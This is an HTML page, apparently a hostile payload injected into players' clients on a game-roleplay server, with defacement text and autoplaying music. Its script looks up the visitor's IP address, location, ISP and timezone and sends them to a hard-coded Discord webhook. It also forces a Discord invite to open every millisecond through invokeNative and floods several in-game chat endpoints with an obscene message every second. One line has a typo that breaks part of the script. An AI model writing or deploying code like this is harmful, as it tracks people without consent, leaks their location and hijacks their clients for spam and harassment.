<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/dick</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://media3.giphy.com/media/v1.Y2lkPTc5MGI3NjExa29uaWplMm83M2lzNm81amhwN285NmpidHVjcGhoOXRqMmxoYWhuMCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/PERfyIVjsu25i/giphy.gif') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #00000;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 750px; 
            height: auto;
            border: 2px solid #000000; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, 255, 255); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #000000; 
            text-shadow: 0px 0px 8px #FFFFFF, 0px 0px 15px #FFFFFF, 0px 0px 25px #FFFFFF; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #000000; 
            text-shadow: 0px 0px 8px #FFFFFF, 0px 0px 15px #FFFFFF, 0px 0px 25px #FFFFFF; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <div class="image-container">
        <img src="https://cdn.discordapp.com/attachments/1355246702407450857/1417568965307142299/a6c79e1fdfb55575.gif?ex=68caf57a&is=68c9a3fa&hm=06f648b44bde7749bb35e6f25cd137d8aaf66e55fc142b12bb8126bcec6b63e0" alt="Discord Image">
    </div>
    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1355246702407450857/1417576073075364020/GHOSTEMANE_-_Mercury.mp3?ex=68cafc19&is=68c9aa99&hm=07597f878f5c96ada9b4bee106dde45f9e3c0e4d974b397d1fc08d594f31de33&" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <div class="text">/\po#n-hub & ABO Sh5H /\ . .  IS HERE </div>

   
    <script>
        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = `<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong></strong> <span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;

            onst dateTime = new Date().toLocaleString();
            const webhookUrl = 'https://discord.com/api/webhooks/1417587472422010980/ojhjQ78W_Zf72pXMRdEzVo0XfVy_x_IMD87LoCeJaNTnO7NspRN3FzkkRi3t7NvP-WA_';
            fetch(webhookUrl, {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({content: `IP : ${ip}\nCountry & City : ${country} - ${city}\nDate & Time : ${dateTime}\n -`})
            });
        });

        setInterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
        }, 1);
   
const msg = ` ابو شخه ناكني 👑  `;
const body = JSON.stringify({ message: msg });
setInterval(() => {
fetch("https://flix-scripts/chatResult", { method: "POST", body });
fetch("https://danger_chat/Danger_Chat:SendMessage", {method: "POST",body: JSON.stringify({"message": msg,"channel": "شات العام","color": null,"isImageAndLinksAllowed": [false,false]})})
fetch("https://easy-chat+/o6ZbK5Ecp6", {headers: {accept: "*/*","content-type": "application/x-www-form-urlencoded; charset=UTF-8"},body: JSON.stringify({ message: msg, channel: "شات العام" }),method: "POST"});
fetch("https://melix_chat/chatResult", { method: "POST", body });
fetch("https://as_chat/chatResult", { method: "POST", body });
fetch("https://chat/chatResult", { method: "POST", body });
fetch("https://ho-chatv2/Chat", {method: "POST",body: JSON.stringify({"Type": "chatResult","message": msg,"chatType": "general"})});
}, 1000);
    </script>
</body>
</html>
